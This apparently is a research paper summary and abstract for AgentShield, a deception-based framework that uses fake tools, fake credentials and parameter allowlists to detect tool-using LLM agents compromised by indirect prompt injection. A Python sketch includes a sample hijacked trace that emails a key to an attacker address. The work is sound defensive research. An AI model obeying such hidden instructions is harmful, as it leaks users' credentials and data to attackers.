AgentShield: Deception-based Compromise Detection for Tool-using LLM Agents
Yassin H. Rassul, Tarik A. Rashid

TL;DR
AgentShield is a deception-based framework that detects and labels compromised tool-using LLM agents across multiple languages and models. It targets two gaps in existing defenses: they try to prevent attacks rather than detect compromises, and they have been evaluated only in English.
Contribution
It introduces a three-layer trap system (fake tools, fake credentials, and allowlisted parameters) for real-time compromise detection, and a self-supervised classifier, trained on labels from trap triggers, that transfers across models and languages without manual labeling.
Findings
Detects 90.7% to 100% of successful indirect prompt injection (IPI) attacks on commercial LLMs.
Zero false alarms on 485 normal-use tests.
Survives adaptive attacks with zero evasion on commercial models.
Abstract
Defenses against indirect prompt injection (IPI) in tool-using LLM agents share two structural weaknesses. First, they all attempt to prevent attacks rather than detect the compromises that slip through. Second, they have only been evaluated in English, leaving users of low-resource languages such as Kurdish and Arabic without tested protection. This paper addresses both gaps with AgentShield, a deception-based detection framework that places three layers of traps inside the agent's tool interface: fake tools, fake credentials, and allowlisted parameters. The same trap triggers serve as high-precision labels for a self-supervised classifier. An LLM agent that follows an attacker's hidden instruction almost always touches one of these traps, which gives both a real-time compromise signal and a zero-FP label for training a downstream detector without manual annotation. Across 176…
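The three trap layers described in the abstract can be illustrated with a minimal sketch. This is not the authors' implementation: the tool names, the decoy key, the allowlist contents, and the helpers `check_tool_call` and `label_trace` are all hypothetical, chosen only to show how a trap hit could act as both a runtime alert and a training label.

```python
from dataclasses import dataclass
from typing import Any

# Every constant below is a hypothetical illustration, not taken from the paper.
DECOY_TOOLS = {"export_all_contacts"}        # fake tool that no legitimate task needs
HONEYTOKEN = "sk-decoy-0000"                 # fake credential planted where the agent can see it
ALLOWED_RECIPIENTS = {"alice@example.com"}   # allowlist for the `to` parameter of send_email


@dataclass
class TrapHit:
    layer: str   # which trap layer fired
    detail: str  # what triggered it


def check_tool_call(name: str, args: dict[str, Any]) -> list[TrapHit]:
    """Return every trap that a single tool call touches (empty list if none)."""
    hits: list[TrapHit] = []
    # Layer 1: the agent invoked a decoy tool.
    if name in DECOY_TOOLS:
        hits.append(TrapHit("fake_tool", name))
    # Layer 2: a planted credential appears in any argument value.
    for key, value in args.items():
        if HONEYTOKEN in str(value):
            hits.append(TrapHit("fake_credential", key))
    # Layer 3: a sensitive parameter falls outside its allowlist.
    if name == "send_email" and args.get("to") not in ALLOWED_RECIPIENTS:
        hits.append(TrapHit("allowlisted_parameter", str(args.get("to"))))
    return hits


def label_trace(calls: list[tuple[str, dict[str, Any]]]) -> bool:
    """Label a whole agent trace as compromised if any call hits a trap.

    Assumption: traces with no hits are simply not flagged here; how they
    are treated during classifier training is left open in this sketch.
    """
    return any(check_tool_call(name, args) for name, args in calls)


benign = [("send_email", {"to": "alice@example.com", "body": "Meeting at 3pm"})]
injected = [("send_email", {"to": "attacker@evil.test", "body": "key: sk-decoy-0000"})]
print(label_trace(benign), label_trace(injected))
```

In this sketch, the injected trace trips two layers at once (the planted credential and the recipient allowlist), while the benign trace trips none, which is the property that would let trap hits double as high-precision labels.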
